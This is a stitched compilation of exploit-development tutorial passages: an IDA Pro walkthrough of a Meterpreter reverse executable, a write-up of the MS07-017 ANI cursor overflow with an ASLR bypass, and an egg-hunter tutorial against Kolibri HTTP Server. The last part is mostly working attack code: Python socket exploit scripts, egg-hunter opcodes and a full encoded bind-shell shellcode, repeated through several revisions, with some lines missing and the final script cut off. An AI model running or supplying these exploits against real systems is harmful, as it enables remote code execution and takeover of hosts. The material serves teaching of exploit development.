In the Meterpreter executable, we can see that the start name is a regular function, which
means it’s an actual function in the executable. There are also quite a lot of ASCII strings
represented by the letter A. This is normally the case for every executable, since each
executable must contain its share of strings. But the Meterpreter executable also uses
imported (I) entries that correspond to the imported library functions, which are also needed if
we want to call functions outside of the executable (located in shared libraries).
Functions window
The functions window lists all the functions present in the executable, even though their name
was automatically assigned by IDA itself. The names window doesn’t do that by default and it
also displays other names. The functions window is used solely to display the name of the
functions. On the picture below, we can see all the functions used in the Meterpreter reverse
executable:
We can see that the function start is located in the .text segment of the executable, that it
starts at the 0x004012A7 virtual address, is 0x9D bytes long, and returns to the caller (flag R).
The explanation of all of the flags can be found if we right-click on the function on the function
window and select “Edit function.” The window presented on the picture below will pop up
showing the explanation of the flags:
The flags are explained as follows:
– R: whether the function returns to the caller
Strings window
The stings window presents the strings that were found by the executable. Keep in mind that
every time we open the strings window, IDA rescans the whole binary and displays them; it
doesn’t keep them stored in one of the database archives. We can see the strings window with
the strings found of the Meterpreter executable on the picture below:
We can control which strings will be presented to us by right-clicking on the strings window
and choosing Setup, where we can change various settings that correspond directly to how IDA
searches for strings. The setup window can be seen on the picture below:
We can see that IDA can scan for various kinds of strings, but defaults to scanning for C 7-bit
strings by default. On the picture above, we can also see that the minimum length of the string
for it to be displayed in the strings window is 5 characters. We will often find ourselves
changing the “allowed string types” to scan for other strings as well, which is good if we have a
hunch that the executable uses other kinds of strings
The “display only defined strings” option will cause IDA to display only named strings and hide
all the others. If we enable “ignore instructions/data definitions,” IDA will also scan for strings
in the code and data sections of the executable. This is a good option if we want to find out if
there are any strings embedded in the actual code of the executable.
Structures
The structures window lists the data structures that could be found in the binary. IDA uses the
functions and their known arguments to figure out whether there’s a data structure present in
the executable or not. In the case of the Meterpreter reverse executable, IDA didn’t find any
structures in the executable, which can be seen on the picture below:
Whenever IDA finds a structure, we can examine it by double-clicking on it. Of course, we can
also check out the data structure on the Internet, but why would we do that if IDA already
provides us with the information we need.
Enums
The enums window lists all the enum data types found in the executable. In the case of reverse
Meterpreter executable, IDA didn’t find any enum data types as can be seen on the picture
below:
Segments
The segments window lists all the sections of the binary. In the case of reverse Meterpreter,
the sections are presented on the picture below:
We can see four sections here: .text, .idata, .rdata and .data. The .text section starts at virtual
address 0x00401000 and ends at the virtual address 0x0040C000. The R/W/X columns are flags
that mean: Read/Write/eXecute. The .text section has the Read and eXecute flags set, which is
mandatory for the executable to be able to actually execute. It would be worrying if the .text
section also has the Write flag set, which would indicate the possibility of self-modifying code
that is common in viruses and worms.
Signatures
Signatures are used to determine the compiler used for the executable by comparing a lot of
known compiler specific signatures to the current executable. IDA will try to apply all of the
signatures taken from one of the files in the sigs directory and apply them to the executable.
The useful thing about signatures is that the functions will already be recognized and we won’t
need to reverse engineer the standard functions that are already known, so we can focus more
on the actual reversing of the program itself. In the case of reverse Meterpreter executable,
IDA isn’t able to determine the compiler used to compile the executable, so the warning below
is shown:
We can click on the “Add signature now” button to select the signatures we would like to
forcibly apply to the executable. A list of available library modules can be seen below:
Conclusion
IDA Pro is a very good disassembler that should be used in every reverse engineering scenario.
We’ve seen the basic windows that IDA Pro uses and introduced them on the reverse
Meterpreter executable. If we want to master IDA Pro, it’s better to completely understand
what we’ve written in this tutorial before moving on to the more advanced stuff.
https://resources.infosecinstitute.com/topic/basics-of-ida-pro-2/
The vulnerability lies in the way ANI headers are handled in Windows. So what are ANI
files? ANI files are animated mouse cursors that are used by Windows. These files follow
the RIFF file format that was developed by IBM and Microsoft. I’m not going to delve into a lot
of details of how RIFF works, will keep it limited to the knowledge we would need.
RIFF file format stores data in chunks. For ANI files, there are mainly two types of
chunks- anih and LIST. anih (ANI Header) chunk stores the metadata about the file
and LIST stores the actual data. Here is an example of an animated cursor:
ANI File Format
After the anih chunk, there is a LIST chunk (like anih chunk, its size is in next 4 bytes and the
data thereafter) but we are interested in anih chunks only. If you want to know about what all
data is stored in ANI header (the purple part), you can look at Structure of the ‘anih’ header
chunk section here. Enough background for now.
The Vulnerability
Windows uses a function LoadCursorIconFromFileMap to use ANI files. It didn’t validate the
size of anih chunks, anything above 36 bytes lead to an overflow, and Microsoft fixed this
in MS05–002. In the patch, the function started validating the anih header size to make sure it
is 36 bytes only. Unfortunately, it was only validating the first anih chunk.
The researcher who found this vulnerability released a PoC ANI file which replicates this
overflow:
(You can use this python script to create this file yourself)
MS07–017 PoC ANI file
In this PoC we can observe two anih chunks. First one is perfectly valid healthy 36 bytes chunk.
Second chunk is a fatty 88 byte (or 0x58 bytes) anih chunk which will lead to an overflow. For
those of you who are wondering why we have random nulls in second chunk, read the
comments in line 476–488 of the metasploit module of this vulnerability.
But how will we deliver this payload? We will have to make Windows load this ANI file for that.
There are multiple ways of doing it but best case scenario would be to deliver this ANI
file remotely to the system. That way we will have a remote code execution! We can make
victim open a malicious webpage, webpages can define custom cursors. Or we can send an
HTML formatted mail to the victim. All you have to do is create a webpage with following
code:
The exploitation
So we have 43434343 written in EIP. How about finding a JMP ESP now? But hold your horses.
We have ASLR enabled here in Windows Vista. Even if we find an address to JMP ESP, it’ll get
changed after we restart the system. Right… RIGHT? Well, sort of. The address indeed will
change, but only the first two bytes. Here’s an example:
ASLR in
action
Note the address of JMP ESP in first image. And then look at it in second image. You can see
the difference ASLR is making- changing only first two bytes while keeping last two constant.
Because of the way stack is laid out, when our exploit would be overwriting the value of EIP, it
would first be overwriting the fourth byte, then the third byte, then the second byte and finally
the first byte. This means that if we overwrite only two bytes in EIP, we would overwrite the
last two bytes. Let’s replicate this first. We would modify our PoC to only overwrite 4343,
not 43434343.
Modified PoC
Note that I have modified the size of RIFF and second anih chunk too (highlighted in yellow).
After using this ANI file, this was the overwrite we’ll get:
So we start searching the 77B5XXXX range for JMP ESP, but no luck. Looking at other registers,
we do have a JMP [EBX] instruction in the range:
JMP [EBX]
And EBX looks interesting too. It holds the address of the beginning of our ANI file.
From Registers pane, we see EBX holds value 02BFF0EC which point to value 02D50000. In the
dump, we can see the value at 02D50000, it points to our ANI file. If we look at our file as
instructions in Instructions pane, that “RIFF” would convert to weird (but safe) instructions.
Before proceeding further let’s verify if our theory of jumping to beginning of our ANI file is
working or not. We can safely replace the 4 bytes after “RIFF” with anything. So let’s put
an INT3 instruction there. Here is how our ANI file would look like:
(Code for creating this file is here)
ANI file to verify JMP [EBX]
The EIP will be overwritten with 700b, which should point to JMP EBX. Let’s put a breakpoint at
this instruction to verify.
The JMP [EBX]
As we can see here, we did hit our breakpoint at JMP [EBX] and then started executing our ANI
file. But how and where do we put our payload? We can only use the 4 bytes after “RIFF”, we
cannot overwrite “ACON” and anih chunk after that. What we can do is place our payload after
valid anih chunk and place a short jump in bytes after “RIFF” to jump to the payload. Currently,
our ANI file is looking like this:
Time for some venom! The code for generating our final ANI file:
https://medium.com/@notsoshant/windows-exploitation-aslr-bypass-ms07-017-
8760378e3e84
Egg Hunters
Egg Hunters Introduction
From the previous parts we should already have an idea about how buffer overflows work. A
program stores a large buffer and at some point we hijack the execution flow we then redirect
control to one of the CPU registers that contains part of our buffer and any instructions there
will be executed. But ask yourself what if, after we gain control, we don't have enough buffer
space for a meaningful payload. It may be the case that the particular vulnerability is not
exploitable but that is unlikely. In this case you need to look for one of two things: (1) the
buffer space before overwriting EIP is also in memory somewhere and (2) a buffer segment
may also be stored in a completely different region of memory. If this other buffer space is
close by you can get there with a "jump to offset", however if it is far away or not easily
accessible we will need to find another technique (we could hardcode an address and jump to
it but for reliability we should never do this).
Enter the “Egg Hunter”! The egg hunter is composed of a set of programmatic instructions that
are translated to opcode and in that respect it is no different than any other shellcode (this is
important because it might also contain badcharacters!!). The purpose of an egg hunter is to
search the entire memory range (stack/heap/..) for our final stage shellcode and redirect
execution flow to it. There are several egg hunters available, if you want to read more about
how they work I suggest this paper by skape. In fact we will be using a slightly modified version
of one of these egg hunters, you can see it's structure below.
loop_inc_page:
loop_inc_one:
loop_check:
loop_check_8_valid:
je loop_inc_page // Yes, invalid ptr, go to the next page
is_egg:
scasd // Compare the dword in edi to eax again (which is now edx + 4)
matched:
jmp edi // Found the egg. Jump 8 bytes past it into our code.
I won't explain exactly how it works, you can read skape's paper for more details. What you
need to know is that the egg hunter contains a user defined 4-byte tag, it will then search
through memory until it finds this tag twice repeated (if the tag is "1234" it will look for
"12341234"). When it finds the tag it will redirect execution flow to just after the tag and so to
our shellcode. If you have any need of an egg hunter in an exploit I highly suggest you use this
one (it is also implemented in !mona but more about that later) because of its small size (32-
bytes), its speed and its portability across windows platforms. You can see the egg hunter
below after it has been converted to opcode.
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
The tag in this case is "b33f", if you use an ASCII tag you can easily convert it to hex with a
quick
google search... In this case we will need to prepend our final stage shellcode with "b33fb33f"
so our
Before we continue to our own exploit I would like to show you what to do if the egg hunter
contains any badcharacters. First we will need to write the 32-bytes to a binary file, to do this
you can use a script I wrote, "bin.sh", you can find it in the coding section. When that is done
we can simply encode it with msfencode. You can see an example of this below, notice how
the encoding affects the byte size.
[>] Clean up
[>] Done!!
buf =
"\xd9\xcf\xd9\x74\x24\xf4\x5e\x33\xc9\xbf\x4d\x1a\x03\x02" +
"\xb1\x09\x31\x7e\x17\x83\xee\xfc\x03\x33\x09\xe1\xf7\xad" +
"\xac\x2f\x08\x3e\xed\xfd\x9d\x42\xa9\xcc\x4c\x7e\x4c\x95" +
"\xe4\x91\xf6\x4b\x36\x5e\x61\x07\xc2\x0f\x18\xfd\x9c\x3a" +
"\x04\xfe\x04"
buf =
"\xdb\xcf\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x43\x56\x6b\x31\x49\x5a\x6b\x4f\x46\x6f\x37" +
"\x32\x46\x32\x70\x6a\x44\x42\x42\x78\x5a\x6d\x46\x4e\x77" +
"\x4c\x35\x55\x32\x7a\x71\x64\x7a\x4f\x48\x38\x73\x52\x57" +
"\x43\x30\x33\x62\x46\x4c\x4b\x4a\x5a\x4c\x6f\x62\x55\x6b" +
"\x5a\x6e\x4f\x43\x45\x69\x77\x59\x6f\x78\x67\x41\x41"
That should be enough background information, time to get to the good stuff!!
So like I said before we will be bringing "Kolibri v2.0 HTTP Server" to it's knees. To do this we
will embed our buffer overflow in an HTTP request. You can see our POC below which should
overwrite EIP. If you decide to recreate this exploit just modify the IP's in the appropriate
places; also 8080 is the default port but essentially this could be changed to anything by
Kolibri.
#!/usr/bin/python
import socket
import os
import sys
Stage1 = "A"*600
buffer = (
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
As per usual we attach Kolibri to Immunity Debugger and execute our POC exploit. You can see
in the screenshot below that we overwrite EIP and that ESP contains part of our buffer. I
should note that if we send a longer buffer we can also overwrite the SEH, there are many
ways to skin a cat as they say but today we are hunting for eggs so lets continue.
Registers
Setting up Stage1
The attentive reader will have noticed that the buffer variable in our POC is called "Stage1",
more about "Stage2" later. Lets figure out the offsets to EIP and ESP. As usual we will replace
our buffer with the metasploit pattern and and let !mona do the heavy lifting.
root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A
o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar
6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
!mona findmsp
Metasploit Pattern
Ok so far so good, based on this information we can reconstruct our buffer as shown below.
EIP will be overwritten by the 4-bytes that directly follow the first 515-bytes and any bytes that
follow after EIP will reside in the ESP register.
Pointer to ESP
Let's select one of these pointers and place it in our buffer. At this point I should explain the
purpose of "Stage1", we will embed our egg hunter here (we will worry about the final stage
shellcode later). Now there are a couple of options here, we could place our egg hunter in ESP
since we certainly have room there but for the sake of neatness I would prefer to place the egg
hunter in the buffer space before overwriting EIP. To accomplish this we will place a "short
jump" instruction at ESP that will hop backwards in our buffer with enough room for our egg
hunter. This "short jump" only requires 2-bytes so we should restructure our buffer as follows.
#!/usr/bin/python
import socket
import os
import sys
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
buffer = (
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
After reattaching Kolibri in the debugger and executing our POC we see that we do hit our
breakpoint.
Breakpoint
Perfect!! If we step through these instructions with F7 we will be brought back to our two B's
located as ESP. Time to make our opcode that will jump back 60-bytes (this is just an arbitrary
value which should provide enough space). The "short jump" opcode starts with "\xEB"
followed by the distance we need to jump. To get this value we will use one of the only useful
tools that comes pre-packaged with windows hehe, observe the screenshots below.
While developing exploits you will learn to appreciate the usefulness of windows calculator.
Anyway lets put our theory to the test, the new buffer should look like this:
After we step through the breakpoint at EIP we get redirected to ESP which contains our “short
jump” opcode and if we take the jump with F7 we will jump back 60-bytes in our buffer
relative to our current position and land nicely in our A's. You can see this in the screenshots
below.
\xEB\xC4
Buffer
All that remains for "Stage1" is to generate and insert our egg hunter in our buffer. You could
use or manually modify the egg hunter at the beginning of this tutorial but like I said before
"!mona" contains an option to generate an egg hunter and specify a custom tag so lets have a
look at that.
Mona Egghunter
Since we know that the egg hunter is 32-bytes long we can easily insert it into our buffer with a
bit of calculation. You can see our final "Stage1" POC below and a screenshot that shows the
egg hunter has been placed nicely between our "short jump" and overwriting EIP.
Egghunter
#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
buffer = (
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.send(buffer)
expl.close()
So this is the state of affairs. Our buffer overflow redirects execution to our egg hunter which
searches in memory for our final stage shellcode (which for the moment doesn't exist of
course). Don't run the exploit because the egg hunter will permanently spike the CPU up to
100% while it looks for the non existent egg...
Setting up Stage2
The question remains where can we put our “Stage2” which contains our egg. There is a
unique quality in HTTP requests that contain buffer overflows. The HTTP request packet
contains several “fields”, not all of them necessary (in fact the packet we are sending in our
exploit is already stripped down considerably). For the sake of simple explanations lets call
these fields 1,2,3,4,5. If there is a buffer overflow in field 1 normally we would assume that
field 2 is just an extension of field 1 as if it was just appended to field 1. However as we will see
these different “fields” will each have a proper location in memory and even though field 1 (or
Stage1 in our case) contains a buffer overflow the other fields will, at the time of the crash, be
loaded separately into memory.
Let's see what happens when we inject a metasploit pattern of 1000-bytes in the “User-Agent”
field. You can see the new POC below...
#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
buffer = (
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
Attach Kolibri to the debugger and put a breakpoint on 0x77C35459 because we need !mona
to search for the metasploit pattern and we don't want the egg hunter code to run. Surprise
surprise as you can see from the screenshot below we can find the complete metasploit
pattern in memory (not once but three times). In fact I did a bit of testing and we can inject
even larger chunks of buffer space though 1000-bytes should be enough.
Metasploit Pattern
Essentially it's Game Over at this point, if we use this buffer space in Stage2 to insert our egg
tag and right after it our payload the egg hunter will find and execute it!
Again as per usual two things remain, (1) modifying our POC so it's ready to accept our
shellcode and (2) generate a payload that is to our liking. You can see the final POC below,
notice that Stage2 contains our egg tag. Any shellcode that is placed in the shellcode variable
will get executed by our egg hunter.
#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
shellcode = (
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
# Stage2: #
# (4) We embed the final stage payload in the HTTP header, which will be put #
# somewhere in memory at the time of the initial crash, b00m Game Over!! #
#-------------------------------------------------------------------------------#
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
Ok so before generating our shellcode there is some final trickery to deal with. After some
testing I noticed that the badcharacter set did not apply for our Stage2 buffer. If you recreate
this exploit feel free to do a proper badcharacter analysis. Since we know for a fact that an
ASCII buffer will not cause any problems (as we can find the metasploit pattern intact) and we
know that we have more than enough room (I think I tested Stage2 up to 3000-bytes) we can
simply generate a payload that is ASCII-encoded.
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
[...snip...]
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 341
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
"\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c"
"\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b"
"\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b"
"\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35"
"\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31"
"\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37"
"\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30"
"\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45"
"\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50"
"\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74"
"\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c"
"\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39"
"\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51"
"\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59"
"\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b"
"\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70"
"\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54"
"\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43"
"\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50"
"\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53"
"\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67"
"\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37"
"\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70"
"\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f"
"\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70"
"\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54"
"\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61"
"\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d"
"\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42"
"\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73"
"\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63"
"\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59"
"\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e"
"\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55"
"\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71"
"\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71"
"\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d"
"\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46"
"\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36"
"\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e"
"\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66"
"\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b"
"\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58"
"\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56"
"\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75"
"\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61"
"\x43\x4b\x4f\x4b\x65\x41\x41";
#!/usr/bin/python
#-------------------------------------------------------------------------------#
# Software: http://cdn01.exploit-db.com/wp-content/themes/exploit/applications/ #
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #
#-------------------------------------------------------------------------------#
# series - http://www.fuzzysecurity.com/tutorials/expDev/4.html #
#-------------------------------------------------------------------------------#
# #
# C:\Documents and Settings\Administrator\Desktop> #
#-------------------------------------------------------------------------------#
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
shellcode = (
"\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c"
"\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b"
"\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b"
"\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35"
"\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31"
"\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37"
"\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30"
"\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45"
"\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50"
"\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74"
"\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c"
"\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39"
"\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51"
"\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59"
"\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b"
"\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70"
"\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54"
"\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43"
"\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50"
"\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53"
"\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67"
"\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37"
"\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70"
"\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f"
"\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70"
"\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54"
"\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61"
"\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d"
"\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42"
"\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73"
"\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63"
"\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59"
"\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e"
"\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55"
